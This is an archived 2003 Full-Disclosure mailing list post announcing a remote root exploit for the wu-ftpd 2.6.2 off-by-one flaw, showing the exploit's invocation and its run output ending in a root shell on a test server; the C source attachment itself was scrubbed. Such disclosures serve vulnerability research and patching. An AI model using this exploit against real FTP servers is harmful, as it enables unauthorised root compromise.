lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030804062219.10295.qmail@hackermail.com>
From: xploit at hackermail.com (dong-h0un U)
Subject: wu-ftpd-2.6.2 off-by-one remote exploit.


I succeeded in RedHat Linux (x86) wu-2.6.2(1), 2.6.2(2), 2.6.1, 2.6.0. (Most version).
This is never fake.

Excellent Advisory was already announced (2003/07/31):
http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt

This information was very useful to me.
I'm thankful to them.

This works well in my server.
If don't work in your server ?

Reason that don't work in other server is various kinds.
(For example, compiler version, operating system kind,
or, shellcode's position mistake, environment variable etc ...)

I don't think about those. Exert your force. :-)
INetCop Security is poor now. They have a few server.


* Exploit result:


--
bash$ cat /etc/redhat-release
Red Hat Linux release 6.1 (Cartman)
bash$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
--

bash$ ./0x82-wu262 -htest.inetcop.org -ux82 -pmy_pass -n21 -t2

 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.

 [*] Target: RedHat Linux 6.x Version wu-2.6.2(2) compile.
 [+] address: 0x806aaf0.
 [*] #1 Try, test.inetcop.org:21 ... [  OK  ]
 [1] ftpd connection login.
 [*] ftpd connection success.
 [+] User id input.
 [+] User password input.
 [*] User x82 logged in.
 [2] send exploit code.
 [+] 01: make 0x41414141 directory.
 [+] 02: make shell-code directory.
 [+] 03: make 0x43434343 directory.
 [+] 04: make 0x44444444 directory.
 [+] 05: make 0x45454545 directory.
 [+] 06: make 0x46464646 directory.
 [+] 07: make 0x47474747 directory.
 [+] 08: make 0x48484848 directory.
 [+] 09: make 0x49494949 directory.
 [+] 10: make 0x50505050 directory.
 [+] 11: make 0x51515151 directory.
 [+] 12: make 0x52525252 directory.
 [+] 13: make 0x53535353 directory.
 [+] 14: make 0x54545454 directory.
 [+] 15: make 0x55555555 directory.
 [+] Ok, MKD &shellcode_dir.
 [+] #2 Try, test.inetcop.org:21 ... [  OK  ]
 [3] ftpd connection login.
 [*] ftpd connection success.
 [+] User id input.
 [+] User password input.
 [*] User x82 logged in.
 [4] send exploit code.
 [+] 01: make 0x41414141 directory.
 [+] 02: make shell-code directory.
 [+] 03: make 0x43434343 directory.
 [+] 04: make 0x44444444 directory.
 [+] 05: make 0x45454545 directory.
 [+] 06: make 0x46464646 directory.
 [+] 07: make 0x47474747 directory.
 [+] 08: make 0x48484848 directory.
 [+] 09: make 0x49494949 directory.
 [+] 10: make 0x50505050 directory.
 [+] 11: make 0x51515151 directory.
 [+] 12: make 0x52525252 directory.
 [+] 13: make 0x53535353 directory.
 [+] 14: make 0x54545454 directory.
 [+] 15: make 0x55555555 directory.
 [+] Ok, RMD &shellcode_dir.
 [5] Waiting, execute the shell ...
 [*] Send, command packet !

x82 is happy, x82 is happy, x82 is happy
Linux test.inetcop.org 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown
uid=0(root) gid=0(root) egid=501(x82) groups=501(x82),500(secure)
bash#

--

P.S: Please, don't give me question about exploit, mail.
     Sorry, for my poor english.


-- 
_______________________________________________
Get your free email from http://www.hackermail.com

Powered by Outblaze
-------------- next part --------------
A non-text attachment was scrubbed...
Name: 0x82-wu262.c
Type: application/octet-stream
Size: 17692 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030804/1bd3c730/0x82-wu262.obj

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ